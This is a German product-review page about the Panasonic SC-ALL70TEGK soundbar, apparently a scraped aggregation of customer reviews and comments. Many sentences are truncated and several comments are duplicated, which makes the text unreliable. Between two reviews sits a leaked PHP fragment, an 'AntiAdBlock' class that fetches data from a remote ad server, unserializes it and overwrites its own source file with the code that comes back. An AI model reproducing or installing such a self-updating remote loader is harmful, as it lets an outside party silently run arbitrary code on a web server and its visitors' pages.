Panasonic SC-ALL70TEGK 3 : So mag ich Technik

Toller klang gut verarbeitet und in verbindung mit einem panasonic fernseher über arc koppelbar. Dadurch lässt sich alles von der meiner fernbedienung vom fernseher aus steuern. Meinung nach ein super preis leistungsverhältnis. Mit 2 sc-all2 lautsprechern ist die sc all70 auf ein dolby surround 5. Es entsteht ein super raumklang der in dieser preisklasse seines gleichen sucht. Den mehrpreis für ein sonos oder bose system höre ich nicht.

Das hauptgerät, der “riegel”, wird zusammen mit dem subwoofer, zwei stromkabeln, einer kleinen fernbedienung, der wandhalterung für das hauptgerät sowie mehreren anleitungen in verschiedenen sprachen im original-panasonic-karton geliefert. Beim auspacken war ich zuerst etwas überrascht, dass es im karton zwei größere hohlräume gab, da aber der riegel nicht sonderlich breit, dafür aber lang ist, und als weiteres “großes” teil nur der subwoofer im quaderformat beliegt, war dies verpackungstechnisch wohl auch nicht anders zu lösen. Nach dem auspacken und der bestandskontrolle konnte der zusammenbau dann auch gleich erfolgen. Die bedienungsanleitung ist an dieser stelle sehr übersichtlich beschrieben, wie was zusammenzustecken ist. Zum glück verfügte unser 4 jahre alte fernseher mit insgesamt 4 hdmi-anschlüssen tatsächlich über einen anschluss, der mit arc gekennzeichnet war. So entfiel der zusätzliche erwerb eines optischen audiokabels, um den ton separat vom sky-receiver zur anlage zu transportieren. Aber der reihe nach:als erstes musste ich leider feststellen, dass ein zusätzliches hdmi-kabel zum anschliessen der anlage fehlte. Ein zustand, über den ich mich jedes mal bei einem druckerkauf schon sehr aufregen kann, dass das wichtigste kabel zum betrieb einfach nicht beiliegt. Was macht man denn zum beispiel an einem sonntag, wenn man die anlage installieren will, und man nicht zufällig zuhause so ein kabel übrig hat?.Schließlich haben wir hier keine amerikansichen verhältnisse, wo man rund um die uhr einkaufen kann.

Der surround lautsprecher der sc-all2 serie ist einfach perfekt. Man kann kaum glauben das es sich hier nur um eine soundbar inkl. Der sound und die pegelfestigkeit kenne ich eigentlich nur von großen systemen mit verstärker etc. Pro: top surround klang, einfache installation, das system kann alles an musik streamen, internet radio , selbst bei geringer lautstärke ein super surround sound contra: ein wenig basslastig, aber nie aufdringlich.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();

Ich habe mich auf dieses panasonic soundbar system ziemlich gefreut, da ich dachte, ich erhalte ein unkompliziertes system und kriege damit einen guten 3. Leider bin ich zur zeit etwas enttäuscht von dem system. Mit dem aufbau kam ich noch recht gut zurande. Das einbinden ins heimische wlan ging nach dem lesen der anleitung im zweiten versuch auch gut von statten. Das gerät strahlt zu beginn ein eigenes wlan ab, in das man sich aber nicht direkt einwählen kann. Es lag daran, dass man die soundbar zunächst mit der beigefügten fernbedienung über das mwnü und den unterpunkt net setup in den paarungsmodus versetzen muss, damit er ein tablet oder smartphone überhaupt als client annimmt. Das also gemacht, danach die soundbar ins wlan gehängt und dann firmwareupdate 10 minuten laufen lassen. Danach soll man das netzkabel ziehen und wieder einstecken.

  • Preis-Leistungsverhältnis Top !
  • Tolles Gerät mit leichten Schwächen
  • Rundum begeistert!

Panasonic SC-ALL70TEGK 3.1 Soundbar System (kabelloser Subwoofer, Multiroom, WiFi, Bluetooth, HDMI, Musik-Streaming, schwarz)

  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • 3.1 All-Soundbar System mit kabellosem Subwoofer und 350 Watt (RMS) Ausgangsleistung
  • Ideal für den 4K Signaldurchlauf eines Players zum TV mit nur einer HDMI Verbindung
  • Einfache Smartphone-Kopplung per NFC und Musikübertragung per Bluetooth
  • Für perfekten Heimkinoklang rückwärtig mit All-Lautsprechern erweiterbar
  • Unterstützung zahlreicher Musik Streaming Dienste wie Spotify, Napster, AllPlay Radio etc.

Vor einigen tagen hat sich meine im sept. 2012 gekaufte soundbar panasonic sc-htb520 verabschiedet. Bei jedem einschalten des tv-gerätes panasonic tx-50dxw734 gab es von der soundbar knapp 40 sekunden lang jede menge störgeräusche. Ab und zu knallte auch der subwoofer. Kabeltausch führte zu keinem positiven ergebnis. Ich vermute, das der digitaltransmitter defekt ist. Meine suche nach ersatz ergab bei panasonic als ergebnis die soundbar sc-all70tegk. Im örtlichen handel (mm und saturn) gab es eine lieferfrist von 6 werktagen. Bei amazon erfreulicherweise sofort lieferbar. Der preis war nicht entscheidend, weil ich gerade mal 10,- € gespart habe.

Die sc all soundbar war gedacht als “anfang vom ende” meiner sonos landschaft in meiner wohnung. Von sonos ist bei mir zu hause alles vertreten mit ausnahme der playbar, da ich mich schlichtweg weigere, ein heimkinoprodukt zu dem preis zu beschaffen, das nicht einmal über hdmi ein und ausgänge verfügt und nicht alle gängigen kinotonformate abspielen kann. Die sc all leistet dies in einwandfreier manier. Anschliessen (ist in 3 minuten erledigt), anschalten und ab geht die lutzi. Die soundbar macht einen mordssound und ist für ihre kompakte bauart gewaltig im auftritt. Ich hab mich recht schnell wieder dazu entschlossen, sie wieder einzupacken und zurückzuschicken. Jedoch lag der grund dafür nicht im auftritt der soundbar selbst, sondern ausschliesslich in der haptik und qualität der app für android, die nicht im ansatz gegen die von sonos anstänkern kann. Da liegen leider nocht welten dazwischen. Und das ist mir halt recht wichtig, dass die ergonomie in der app von der beschaffenheit ist, dass man sofort merkt, dass sich da sie entwickler gedanken gemacht haben und das ist bei der panasonic app nicht der fall. Die hat in schulnoten gerade noch ein ausreichend verdient, mehr nicht.

Die soundbar sc-all70tegk von panasonic wird ohne umverpackung im originalkarton geliefert. Ausgepackt ist die edel aussehende soundbar somit schnell. Der subwoofer ist recht schmal und oben in klavierlack gehalten, die soundbar selbst lang, dafür aber auch sehr schmal, sodass sie problemlos unter dem tv liegen kann. Allerdings ist auch eine wandhalterung möglich, entsprechende aufhängungen werden mitgeliefert. Zum lieferumfang gehört zudem noch eine kleine, recht einfach gehaltene fernbedienung. Nach dem anschließen muss die soundbar erst einmal verbindung mit dem hauseigenen wlan aufnehmen. Dies funktioniert entweder über smartphones/tablets, über wps oder einem lan-kabel. Nach zweimaligem lesen der mitgelieferten bedienungsanleitung haben wir dann auch verstanden wie das gedacht ist. Allerdings ließ die soundbar sich weder über ein samsung s3 noch über ein samsung s5 ins wlan einbinden. So wurde dann die wps-variante gewählt, was reibungslos funktioniert hat.

Also ich hatte keine ahnung das heutzutage soundbars so einen klang erzeugen können, vielmehr war ich dann auch noch von den ganzen zusatzfunktionen erstaunt. Eingebautes internetradio, app-funktion, streaming und das beste: ein kabelloses 5. Auf der suche nach einer möglichkeit meine riesen standlautsprecher samt verstärker und den ganzen kabeln los zu werden zeigte mir ein netter verkäufer was alles heute möglich ist mit soundbars. 1 sytem jetzt seit einem monat und ich bin begeistert, der klang, die ganzen funktionen und dann auch noch das ganze zu einem sehr angemessen preis. Falls ihr aus der umgebung köln kommen solltet könnt ihr euch das gerät im media markt in frechen, da es anscheinend doch sehr viele märkte gibt welche die komplette produktpalette der all serie nicht führen.

Ich habe die soundbar und zwei all 2 seit ca. 1 jahr im einsatz bin mit dem system voll zufrieden. Über bluetooth und dem echo dot funktioniert es super. Wünschenswert wäre in zukunft ein skill mit dem man direkt ohne umwege lauter / leiser usw.

Eigentlich sollten die allplay-komponenten meine squeezeboxen ersetzen, weil man ja nicht weiss, wie lange die noch mit spotify und napster laufen. Also all8, all7, all2 und all1 für die stereo-anlage gekauft. Die installation ist etwas mühselig, nachdem man sich 3-4 stunden mit den komponenten beschäftigt hat, läuft es “einigermassen”. Die ernüchterung kommt dann in den nächsten tagen. Keine verbindung zwischen den geräten, napster läuft nicht oder nur unrund, das gleiche bei spotity. Dann die party, für die die komponenten gekauft wurden. Anfangs geht es, dann nachdem zufällig ein gerät abgestellt wurde, völliger zusammenbruch des systems. Ich habe dann noch einige male versucht, das system ans laufen zu kriegen, alles zurückgesetzt, alle komponenten auf einem eigenen wlan auf der fritzbox laufen lassen, keine verbesserung. Alle komponenten per netzwerkkabel angeschlossen, dann ging es etwas besser, lief aber auch nicht störungsfrei. Der klang, besonders der all8 und all7 sind sehr gut.

War auf der suche nach einer neuen soundbarund bin hier fündig geworden. Muss sagen bin sehr begeistert von diesen system. Kopplung mit woofer funtioniert 1a. Einstellmöglichkeiten gibt es jede menge. Man schaltet einfach mit dem handy die soundbar ein und schon spielt die ausgewählte musik. Bluetooth anbindung funktioniert ebenfalls sehr gut. Einzig was ein wenig stört, wenn man rear lautsprecher hinzufügen will , das die nicht grad billig sind. Aber man könnte damit ein surround system zusammenstellen.

Bin begeistert von dem sound system. Der klang ist 1a bringt alles reibungslos rüber. Für meine wohnung reicht sie locker und möchte auch nichts anderes haben wollen. Also ich kann sie nur empfehlen.

Panasonic verpackt die soundbar mit der bassbox zwar sehr gut und versandgerecht sicher, leider spart sich amazon aber einen umkarton, so kommt der karton je nach zusteller angeschlagen und/oder schmutzig an. Schön finde ich das nicht und frage mich auch, wie es bei retouren aussieht, bekommt der nächste etwa den überklebten verbeulten verkaufskarton?nun ja, innen war alles bestens. Geordert habe ich zeitversetzt neben der soundbar zweimal die lautsprecher all2 als 5. 1 aufrüstung für die sc-all70. Gedacht ist der all2 eigentlich für kleine räume wie küche oder schlafzimmer als einzel-lautsprecher in mono. Die bedienungsanleitung:es liegt zwar ein dickes gebundenes buch bei, deutsch ist allerdings nur ein kleiner teil davon. Eigentlich wird alles brauchbar erklärt, zumindest wenn man es dann endlich hinbekommen hat, weiß man wie es geht. Für die beiden all2 lautsprecher ist die unbedingt herunterzuladende pdf-anleitung gut und man braucht sie auch. In kombi sc-all70/all2 (für 5. 1) können die anleitungen widersprüchlicher nicht sein, da z.

Ich habe mich vorher sehr lange über soundsysteme mit multiroom funktion informiert, da ich keine 1500€ für eine soundbar und bassbox ausgeben wollte. Am ende habe ich mich auf panasonic festgelegt. Gekauft habe ich diese nicht hier, sondern da wo es anfang des jahres die mwst geschenkt gab und mit der cashback aktion wurde die soundbar zum schnapper :)man muss sich schon etwas damit beschäftigen, wenn man die multiroom funktion nutzt, aber danach ist es easy und man kann alles super mit dem handy steuern. Der klang ist sehr gut und die “basslastigkeit” ist nicht zu stark. Die untermieter haben sich noch nie beschwert. Die all05 habe ich mir auch sofort gegönnt und es werden noch weitere folgen.

Ein wort: wowvorallem der bass ist richtig heftig. Klang ist spitze für den preis. Kaufempfehlung an alle, vor allem an die welche es für ihr zimmer verwenden.

Die all connected soundbar all70t ist ein 3. 1 soundsystem für das heimische fernsehen. Es kann auch 4k signale zum beispiel von einem player zum ultra hd tv zum fernsehen durchschleifen. Das gerät ist knapp einen meter breit, gut fünf zentimeter hoch und zwölf zentimeter tief. Dazu gehört auch ein kabelloser sub-woofer. Alle drei hauptlautsprecher haben je 70 watt und der subwoofer nochmal 140. Es ist möglich, über multiroom-streaming musik auf mehreren geräten im haus gleichzeitig zu hören. Die integration ist einfach. Nach dem einschalten wird es automatisch vom smartphone erkannt, nachdem das wifi passwort eingegeben wurde. Das gerät macht wirklich spaß.

Auch für laien sehr verständlich. . Die fernbedienung hat nur eine sehr geringe reichweite.

Angeschlossen und funktioniert. Wenn man im panasonicmenü der tv die reihenfolge der hdmi buchsen sortiert, startet auch nichts anderes mit. Der sound ist mehr als ich erwartet hatte für den preis.

Ich wollte eine neue stereoanlage und habe mich schnell von dieser soundbar überzeugen lassen, da meine tv lautsprecher oft klappern. Ich habe mir das produkt bei media markt gekauft, nun weiß ich hier ist es 20€ günstiger. Die installation hat etwa 20 minuten gedauert, mehr zeit kostete mich aber die einstellung am fernseher. Der grundig fernseher von 2008 aktiviert die soundbar beim anmachen nicht, wenn ich die soundbar anmache bevor der fernseher an ist geht der ton nur auf dem tv. Also muss ich den fernseher anmachen und dann nach einer halben minute die soundbar, das führt jetzt schon dazu, dass ich oft wieder über den fernseher ton abspiele. Wenn ich die playstation 3 anschalte, funktioniert alles wie es soll, schalte ich wieder auf das fernsehprogramm erkennt der fernseher die soundbar gar nicht mehr. Ich muss also jedes mal die geräte neu suchen lassen und dann ein und umstellen, das dauert jedes mal etwa 2 minuten. Zum klang:ich war positiv überrascht, wie voll die klänge wirken und wie stark der bass ist. Der bass ist auch auf stufe 1 sehr stark, sodass ich abends beim zocken nur auf ganz leise stellen darf, weil sonst alles wummert. Musikwiedergabe über spotify ist kein problem, weder über wlan noch über bluetooth.

Insgesamt aus meiner sicht ein sehr ordentliches preis-/leistungsverhältnis. Klang ist für mein empfinden sehr gut, die steuerung über die app funktioniert wie gedacht. Insofern bin ich bisher zufrieden. Dennoch 2 wesentliche kritikpunkte, die den 5ten stern (noch) verhindern:- zum einen ist die anlage vor allem beim musik hören relativ sensibel im hinblick auf die lautstärkenregelung aus den apps heraus. Das liegt zum einen an den verwendeten unspezifischen reglern, zum anderen aber auch an der einstellung, dass (zumindest bei android) die laut-/und leiser-tasten die anlage in 6er schritten lauter bzw. Am anfang sind mir da ein-zwei mal die ohren weggeflogen. Das sollte geändert werden. Und zumindest bei den panasonic-eigenen apps sollten spezifischere regler verwendet werden, sodass man bessere kontrolle über die einstellungen zur lautstärke erhält. – zum anderen haben wir momentan das problem, dass die anlage nach dem ersten einschalten keinen mucks von sich gibt, wenn wir im tv-modus sind.

Super sound, einrichtung problemlos, ausreichend viele einstellmöglichkeiten. Die einbindung in mein heimnetzwerk habe ich über netzwerkkabel gelöst (ist einfach eine stabilere anbindung als das wlan), ging völlig problemlos. In verbindung mit 2x scall2 wireless speakern habe ich ein prima funktionierendes 5. 1 surroundsystem an meinem fernseher. Und da über das netzwerk der zugriff auf meine musiksammlung problemlos möglich ist (gesteuert wird über ein tablet ios und android), ist auch die alte stereoanlage (fast – radio klappt noch nicht, werde ich über einen dlna server mit stream-transcoding lösen müssen) überflüssig. Auch der preis ist klasse – insbesondere jetzt während der cashback aktion von panasonic. Man muss aber jede komponente einzeln kaufen, sonst gibt es nur einmal cashback und nicht für jeden artikel.

Die soundbar an sich ist gut. Im zusammenspiel mit tv und blurayplayer läuft alles – wie von panasonic gewohnt – super. Der sound der anlage ist sehr gut. Beim aufstellen der soundbar auf einem rack, schrank etc. Ist allerdings das display schlecht ablesbar. Die minuspunkte gibt es aber für die app, die nicht mehr zeitgemäß ist. Fehlende bedienbarkeit der soundbarÜber die app kann die soundbar nicht vollständig bedient werden (z. Ein/ausschalten, einstellen der soundmodi etc nicht möglich).

So, nachdem ich über wochen hinweg mehrere soundbars “getestet” hatte – soweit das im einschlägigen elektromarkt möglich ist, denn dort ist ein vernünftiges anhören durch den “soundbrei” aus hunderten lautsprechern nicht möglich – hatte ich mich eigentlich für eine teufel entschieden. Der sound war super, allerdings passte der subwoofer nicht an meine räumlichen gegebenheiten. War der pegel zu hoch eingestellt, dann bekam man dermaßen druck auf die ohren, dass meine bessere hälfte rebellierte. Bei zu niedrigem pegel war der bass halt nicht wirklich vorhanden. Die aufstellung war durch den kabelgebundenen sub einfach nicht optimal. Dann entschied ich mich für die panasonic mit dem wireless-subwoofer. Und ich muss sagen: paaaassst. Auch wenn der direkte vergleich in bezug auf die verarbeitung etwas ernüchternd ausfällt, der sound macht es wieder wett. Wie schon mehrmals von anderen beschrieben, ist bei reinem musikbetrieb manch billige stereoanlage vermutlich besser – aber das ist auch nicht das eigentliche einsatzgebiet einer soundbar. Gegenüber den schwachbrüstigen lautsprechern meines flat-tv`s ist die soundbar aber ein echtes highlight.

Geliefert wird die soundbar mit der bar mit 2 integrierten lautsprechern, einer erstaunlich großen subwoofer-einheit, fernsteuerung, zwei netzkabeln für subwoofer und hauptgerät, ir-blaster (anzuschließen, wenn fernsteuerung von tv und soundbar sich überschneiden), zwei wandhalterungen mit schrauben und einer kurz- und einer ausführlichen anleitung in papierform. Das für den anschluss an das tv, bzw. Dvd/blueray-system benötigte hdmi-kabel liegt dem paket nicht bei und muss nachgekauft werden. Die ausführliche betriebsanleitung ist dem hersteller gut gelungen. Installation:zunächst einmal muss das gerät über ein hdmi-kabel mit dem fernseher verbunden werden, man kann es aber natürlich auch nur über hdmi mit einem abspielgerät verbinden. Einfach hat man es, wenn der heimische fernseher wie zum beispiel mein eigener über einen hdmi/arc anschluss verfügt: dann reicht es, das hdmi-kabel da rein zu stecken. Hat man nur normale hdmi-anschlüsse muss man sich zusätzlich noch ein optisches digitales audiokabel besorgen und zusätzlich dieses mit dem fernseher verbinden. Beim anschluss an ein abspielgerät reicht dagegen der anschluss an ein normales hdmi-out aus. Erst wenn dieser erstanschluss steht, soll man die geräte mit dem stromnetz verbinden. Beim aufstellen in meinem zimmer mit relativ kleinem wohnzimmerschranken erwies sich die soundbar als ein bisschen zu lang: sie liegt jetzt einfach vor dem schranken unter dem fernseher.

Ich habe sehr lange gesucht und getestet und bin von markt zu markt gerannt. Deswegen hier mein erfahrungsberichtmeine ausgangssituation war, dass ich mich von meiner bestehende 5. 1 anlage mit yamaha av receiver und heco boxen verabschieden wollte. Vom sound her bin ich nach wie vor sehr zufrieden aber das ganze kabelwirrwarr und die größe nervt einfach irgendwann. Und da es ja lösungen gibt, wieso nicht wechseln. Was für mich und meine situation noch wichtig war war, dass die soundbar nicht zu hoch sein durfte, da ich einen sony bravia tv habe welcher auf 2 füßen auf einem tv board steht. Der abstand zum unteren bildrand beträgt lediglich 8cm. Der abstand zum ir sensor gerade mal 4cm. Jetzt kommen natürlich die üblichen verdächtigen in frage. Also mal geschaut was die so können – in stichpunkten (einfach mal runter geschrieben.

Optisch ist das panasonic soundbar system zunächst recht dezent. Die soundbar ist sehr flach und kann entweder unterhalb des fernsehers aufgestellt oder mithilfe einer wandvorrichtung aufgehängt werden. Der dazugehörige subwoofer wird gemäß der anleitung im zimmer aufgebaut und dann kann es an die einrichtung gehen:zur einrichtung:im großen und ganzen ist die einrichtung unkompliziert. Es werden dazu zwei anleitungen mitgeliefert: eine kurzanleitung, die meiner meinung nach etwas zu kurz gehalten ist (mir war damit einiges bzgl. Der wlan-einrichtung nicht ganz klar) und eine sehr ausführliche anleitung, die auch nicht-experten sicher durch die einrichtung führt. Zunächst muss eine verbindung zum wlan-netzwerk geschaffen werden. Dies soll auch mit dem handy funktionieren, hat aber bei uns (ausprobiert mit iphone 4 und iphone 5s) nicht geklappt. Da es aber die alternative gibt, das ganze über wps (wireless-protected-setup, bitte vorher überprüfen, ob der router das kann), haben wir es damit versucht und es klappte auf anhieb. Zur allergrößten not kann man aber auch ein lan-kabel verwenden. Verwendung mit dem fernseher:sobald die soundbar mit dem fernseher über ein hdmi-kabel verbunden ist, kann man sie als externen lautsprecher verwenden, was wunderbar funktioniert.

Summary
Review Date
Reviewed Item
Panasonic SC-ALL70TEGK 3.1 Soundbar System (kabelloser Subwoofer, Multiroom, WiFi, Bluetooth, HDMI, Musik-Streaming, schwarz)
Rating
5,0 of 5 stars, based on 40 reviews

Author: SmartHome

1 thought on “Panasonic SC-ALL70TEGK 3 : So mag ich Technik

  1. Im februar gekauft, im november die ersten ausfälle. Am anfang schaltet sich das gerät selbstständig aus, dann nicht mehr zu starten. Betrieb als tv ton (panasonic), bd (panasonic) und bluetooth radio über smartphone (samsung). Eigentlich nichts, was man falsch machen könnte. Bei dem zeitgleich gekauften bd player bietet amazon support an, bei der soundbar nicht?. Wenn man schrott verkauft muss ma sich auch um die regulierung bei defekten kümmern. Den support button wegzuprogrammieren ist einfach nur erbärmlich.
    1. Im februar gekauft, im november die ersten ausfälle. Am anfang schaltet sich das gerät selbstständig aus, dann nicht mehr zu starten. Betrieb als tv ton (panasonic), bd (panasonic) und bluetooth radio über smartphone (samsung). Eigentlich nichts, was man falsch machen könnte. Bei dem zeitgleich gekauften bd player bietet amazon support an, bei der soundbar nicht?. Wenn man schrott verkauft muss ma sich auch um die regulierung bei defekten kümmern. Den support button wegzuprogrammieren ist einfach nur erbärmlich.
  2. Rezension bezieht sich auf : Panasonic SC-ALL70TEGK 3.1 Soundbar System (kabelloser Subwoofer, Multiroom, WiFi, Bluetooth, HDMI, Musik-Streaming, schwarz)

    Ich bin absolut enttäuscht. Der subwoofer macht noch paar dumpfe geräusche und das wars auch schon.
    1. Ich bin absolut enttäuscht. Der subwoofer macht noch paar dumpfe geräusche und das wars auch schon.
  3. Rezension bezieht sich auf : Panasonic SC-ALL70TEGK 3.1 Soundbar System (kabelloser Subwoofer, Multiroom, WiFi, Bluetooth, HDMI, Musik-Streaming, schwarz)

    Tolles produkt, das gut mit anderen geräten von panasonic per viera link zusammenspielt. Toller sound mit kräftigem baß. Hab die soundbar mit zwei all 2 lautsprechern als 5. Super klang bei nativem dignal in dd oder dts. Dazu durch kabellose installation hohe flexibilität in der aufstellung. Kritik:bedienung etwas umständlich. Wenn man stb und player hat, kann man nur ein audiosignal nativ nutzen, da die fernseher beim durchschleifen nur pcm weitergeben. Zwei eingänge wären hier wünschenswert.
  4. Rezension bezieht sich auf : Panasonic SC-ALL70TEGK 3.1 Soundbar System (kabelloser Subwoofer, Multiroom, WiFi, Bluetooth, HDMI, Musik-Streaming, schwarz)

    Tolles produkt, das gut mit anderen geräten von panasonic per viera link zusammenspielt. Toller sound mit kräftigem baß. Hab die soundbar mit zwei all 2 lautsprechern als 5. Super klang bei nativem dignal in dd oder dts. Dazu durch kabellose installation hohe flexibilität in der aufstellung. Kritik:bedienung etwas umständlich. Wenn man stb und player hat, kann man nur ein audiosignal nativ nutzen, da die fernseher beim durchschleifen nur pcm weitergeben. Zwei eingänge wären hier wünschenswert.
    1. Habe das gerät als neu bestellt und es war offensichtlich gebraucht. Ich verstehe, dass kunden ein rückgaberecht haben, diese geräte können dann aber nicht als neu angeboten werden. Offensichtliche gebrauchsspuren und die Öffnung von voher eingeschweißten zubehör sind eindeutig.
      1. Habe das gerät als neu bestellt und es war offensichtlich gebraucht. Ich verstehe, dass kunden ein rückgaberecht haben, diese geräte können dann aber nicht als neu angeboten werden. Offensichtliche gebrauchsspuren und die Öffnung von voher eingeschweißten zubehör sind eindeutig.
  5. Rezension bezieht sich auf : Panasonic SC-ALL70TEGK 3.1 Soundbar System (kabelloser Subwoofer, Multiroom, WiFi, Bluetooth, HDMI, Musik-Streaming, schwarz)

    Die soundbar ist der absolute murks. Nach einem jahr ist das display kaputt,so dass ich nicht mehr zwischen den verschiedenen modi schalten kann. An stelle des anzeigenamens habe ich nur noch einen zeichensalat. Faktisch ist das gerät nicht mehr zu gebrauchen. 400€ für ein jahr ist ein bißchen zu viel.
    1. Die soundbar ist der absolute murks. Nach einem jahr ist das display kaputt,so dass ich nicht mehr zwischen den verschiedenen modi schalten kann. An stelle des anzeigenamens habe ich nur noch einen zeichensalat. Faktisch ist das gerät nicht mehr zu gebrauchen. 400€ für ein jahr ist ein bißchen zu viel.
  6. Rezension bezieht sich auf : Panasonic SC-ALL70TEGK 3.1 Soundbar System (kabelloser Subwoofer, Multiroom, WiFi, Bluetooth, HDMI, Musik-Streaming, schwarz)

    Ehrlich gesagt, kann ich die vielen guten rezensionen hier nicht nachvollziehen. Ich bin bestimmt kein hifi experte, aber das produkt überzeugt mich nicht wirklich. Laut produktbeschreibung kann die soundbar zwar fast alles, dann aber doch wieder nichts wirklich gut. Der sound der soundbar ist dabei wirklich gut wenn man sich einen actionfilm oder dergleichen ansieht, der bass ist zwar nicht wirklich harmonisch und etwas ruppig und die höhen nicht immer gut, aber für den preis wäre das noch akzeptabel und ausreichend – auf jeden fall besser als alle tv lautsprecher. Hier hat sich gezeigt, dass hdmi arc meist zwar gut funktioniert, die soundbar aber öfters nicht mit dem tv mit einschaltet – warum auch immer. Bei normalen fernsehen zeigt die soundbar bereits erste schwächen, ich habe wirklich kein so gutes gehör, aber der subwoofer nervt da einfach immer – habe ihn bereits auf stufe 1 zurück gestellt und trotzdem kommt immer ein latentes hintergrundrauschen bei dialogen aus dem woofer – die grenzfrequenz ist hier leider viel zu hoch, vor allem wenn man leise fernsehen will eine absolute katastrophe. Bei einem senderwechsel verzögert die soundbar und braucht ein 1-2 sekunden bis der ton einsetzt. 